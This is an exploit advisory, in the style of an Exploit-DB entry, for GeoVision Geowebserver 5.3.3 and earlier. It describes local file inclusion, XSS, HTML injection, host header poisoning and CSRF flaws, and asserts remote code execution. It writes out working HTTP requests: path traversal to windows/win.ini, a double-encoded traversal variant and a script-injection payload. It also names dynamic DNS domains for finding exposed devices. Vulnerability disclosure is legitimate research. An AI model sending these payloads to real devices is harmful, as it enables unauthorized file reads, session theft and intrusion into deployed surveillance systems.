# Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE  
# DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM  
# Date: 6-16-21 (Vendor Notified)  
# Exploit Author: Ken 's1ngular1ty' Pyle  
# Vendor Homepage:  
# Version: <= 5.3.3  
# Tested on: Windows 20XX / MULTIPLE  
# CVE :  
GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:  
Nested Exploitation of the LFI, XSS, HTML / Browser Injection:  
GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1  
Absolute exploitation of the LFI:  
POST /Visitor/bin/WebStrings.srf?obj_name=win.ini  
GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini  
Additionally, the vendor has issued an ineffective / broken patch ( which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.  
ex. obj_name=INJECTEDHTML / XSS  
The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:  
ex. /Visitor//%252e(path to target)  
These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:  
The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.  
These attacks were disclosed as part of the IOTVillage Presentation: